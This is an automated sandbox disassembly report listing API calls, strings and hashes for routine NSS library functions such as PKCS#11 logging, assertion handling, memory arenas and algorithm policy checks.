Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2B25

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C7A2BC0

Strings

*pulCount = 0x%x, xrefs: 6C7A2BBB
pMechanismList = 0x%p, xrefs: 6C7A2B39
slotID = 0x%x, xrefs: 6C7A2B20
C_GetMechanismList, xrefs: 6C7A2B07
pulCount = 0x%p, xrefs: 6C7A2B54

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList
API String ID: 1342304006-3652739913
Opcode ID: ff13ed9908a0323e533245707f2e48d608b174b026b9781835a801c9685fe70b
Instruction ID: aeeab16312b5c1b7fe3d6cdfd6b924785a16d9847b50133ac2aebbff37ba81d8
Opcode Fuzzy Hash: ff13ed9908a0323e533245707f2e48d608b174b026b9781835a801c9685fe70b
Instruction Fuzzy Hash: D421D631602145EFDB208F99DE8CE557771EB4632DF048475E80893B22EB34BC45CB91

Function 6C880EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C762357), ref: 6C880EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C762357), ref: 6C880EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C880EE6

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C880EFA

Part of subcall function 6C76AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C76AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C880F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C880ED9, 6C880EE5, 6C880F06, 6C880F0B
Aborting, xrefs: 6C880EB3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction ID: 95dbdf9d075b9440fe2e9f0ab8b3f228ff663e2d3dd732bc2caf5fecd2a6dcd8
Opcode Fuzzy Hash: 4bf925064706de039615ff9404ece918175a969144902e7770f6adedba36fa10
Instruction Fuzzy Hash: 5AF0A4B99001187BDA203BA19C4AC9B3F2DDF42369F004434FE0956B03DB36EA5596F2

Function 6C7E4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E4DCB

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7E4DE1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7E4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E4E59

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C8A300C,00000000), ref: 6C7E4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C7E4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7E4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E521A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction ID: 34dcbb59c3230a960a31f102413f193d8210f8c29fc9f8198eb57eb082ecf93d
Opcode Fuzzy Hash: e19f99d60a5dbbb858220a4ca60d69d0f57c4f7f169595bc98d21a840ce35b07
Instruction Fuzzy Hash: F4F16E72E00209CFDB04CF94E9407ADB7B2FF49358F258169E915AB781E775E981CB90

Function 6C7F6BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6C800293), ref: 6C7F6BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6C7F6C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7F6C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6C7F6CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C7F6EE9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: dbfa809a94d240fa17e9f401d97fc5299fcd37fbcc13bfdace14d0f53e4fd2eb
Instruction ID: 1896ae18c930880a6edceee3643d7dda65419539389b76e05e7442c69733bf9a
Opcode Fuzzy Hash: dbfa809a94d240fa17e9f401d97fc5299fcd37fbcc13bfdace14d0f53e4fd2eb
Instruction Fuzzy Hash: 85910873A141858BEB209A6CCED17983674AB5233DF34037AD172EBBD2E361A7478351

Function 6C774FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C77502A
PR_NewLock.NSS3(00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C775034
PL_NewHashTable.NSS3(00000000,6C7CFE80,6C7CFD30,6C81C350,00000000,00000000,00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C775055
PL_NewHashTable.NSS3(00000000,6C7CFE80,6C7CFD30,6C81C350,00000000,00000000,?,00000001,00000000,6C8C0148,?,6C786FEC), ref: 6C77506D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: e620ea8200646f53bfbce6f20205d2b12e8303b87a6c1a375c5b2e9ee64be2d9
Instruction ID: 1435252145804286d7052400a5d592b113995eadc7515e2ab872c058ca050c59
Opcode Fuzzy Hash: e620ea8200646f53bfbce6f20205d2b12e8303b87a6c1a375c5b2e9ee64be2d9
Instruction Fuzzy Hash: 64319AB1B052249BEF709B659B4CF4736B8BB1236CF158134EA0587A40E779B904CBF1

Function 6C712E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C712F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C712FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C713005
memcpy.VCRUNTIME140(?,?,?), ref: 6C7130EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C713131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C713178

Strings

database corruption, xrefs: 6C71316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C713022, 6C713156, 6C713162, 6C71318A, 6C713196, 6C7131A2, 6C7131AE, 6C7131BA, 6C7131C6
%s at line %d of [%.10s], xrefs: 6C713171

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction ID: 6fde377befe9a8a92e561df84e8383fcb81db84f4233f9b0377bb6b9b7dd416e
Opcode Fuzzy Hash: 02fadaab0bf685c2a62b37efe6a2e500dbbd20990471ba8001ff7b9a6b8cf04a
Instruction Fuzzy Hash: 9EB1B4B0E092199FCB18CF9DCA84AEEB7B2BF49314F184429E545B7B41D374A941DBA0

Function 6C7CA470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7CA4A6

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

PORT_Alloc_Util.NSS3(?), ref: 6C7CA4EC

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C7CA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C7CA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C7CA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7CA596
free.MOZGLUE(?), ref: 6C7CA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7CA5B6

Strings

^jxl, xrefs: 6C7CA475

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^jxl
API String ID: 3906949479-3962845174
Opcode ID: d59d2409a72e5ac7444ccb5783f70cd6ca8a2ddeeda5b3502df4355ed8274ef3
Instruction ID: 21d672017d25759cfc15abdc80ce7caa60389861f33fd670c4bf827b1343a655
Opcode Fuzzy Hash: d59d2409a72e5ac7444ccb5783f70cd6ca8a2ddeeda5b3502df4355ed8274ef3
Instruction Fuzzy Hash: 5C411771B042439FDB10CF59DE40BAABBB1AF40318F15C478D8695BB42E732E919C7A2

Function 6C7A6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C7A6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6CA3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A6CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C7A6C9C
C_DigestInit, xrefs: 6C7A6C61
pMechanism = 0x%p, xrefs: 6C7A6CD0
hSession = 0x%x, xrefs: 6C7A6C7E, 6C7A6C8E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction ID: cea1f0e0e8c0deab1e154d8d3909dee32d204ea93811d88b772e29b4c9ab9e2d
Opcode Fuzzy Hash: b13b5b458fae85f5e85c830957ba1f6d736cd8630f46a9a8903c989b927b1960
Instruction Fuzzy Hash: 4821E331602114ABDB209BA89F8DB9A77B5EB4631DF448535E80997B02DB34BE09C7D2

Function 6C770F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C770F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C770F84

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C78F59B,6C89890C,?), ref: 6C770FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C770FC1

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C770FDB
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C770FEF
PL_FreeArenaPool.NSS3(?), ref: 6C771001
PL_FinishArenaPool.NSS3(?), ref: 6C771009

Strings

security, xrefs: 6C770F5C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction ID: 653c0276bede34dc106a822bf4594aea11cbc948d1b0fa73d99b0ca8fb56cb94
Opcode Fuzzy Hash: ba143f651d26496e45517994c0fc80867c658541e2a7c52f8c4bebb9ddb2acd4
Instruction Fuzzy Hash: 89212B71904304ABDB209F24DE45AAB77B4EF4525CF048928FC1897701F731E645C7E2

Function 6C882AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882AE8
strdup.MOZGLUE(00000000), ref: 6C882AFA
PR_ExitMonitor.NSS3 ref: 6C882B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6C882B1E
strdup.MOZGLUE(.;\lib), ref: 6C882B32
PR_ExitMonitor.NSS3 ref: 6C882B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C882B59

Strings

.;\lib, xrefs: 6C882B29, 6C882B31
LD_LIBRARY_PATH, xrefs: 6C882B19

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: 785955c0d74bcf177590aa2fe64345b4951cd266c0139e79479176ac441319c3
Instruction ID: e9893993ce5835a670f986ba16c15687714e8176b82ad930f2e23a8db81db5bf
Opcode Fuzzy Hash: 785955c0d74bcf177590aa2fe64345b4951cd266c0139e79479176ac441319c3
Instruction Fuzzy Hash: CB0167B5F0112167EB306BA9AE0975637B49F1265DF080934EC0AD1E12FB29ED28C7D7

Function 6C80AB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C80A6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6C8080C1), ref: 6C80A6F9
Part of subcall function 6C80A6D0: memcpy.VCRUNTIME140(00000210,6C8D0BEC,0000011C), ref: 6C80A869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6C8080AD), ref: 6C80AB48

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6C8080AD), ref: 6C80AB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6C8080AD), ref: 6C80ABA7
memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6C8080AD), ref: 6C80ABFE
memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6C8080AD), ref: 6C80AC1C
memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6C8080AD), ref: 6C80AC48

Part of subcall function 6C805BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6C8080E3,00000000), ref: 6C805BD6
Part of subcall function 6C805BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6C8080E3,00000000), ref: 6C805BED
Part of subcall function 6C805BC0: PR_EnterMonitor.NSS3(07890478,?,?,6C8080E3,00000000), ref: 6C805C04
Part of subcall function 6C805BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6C8080E3,00000000), ref: 6C805C1B
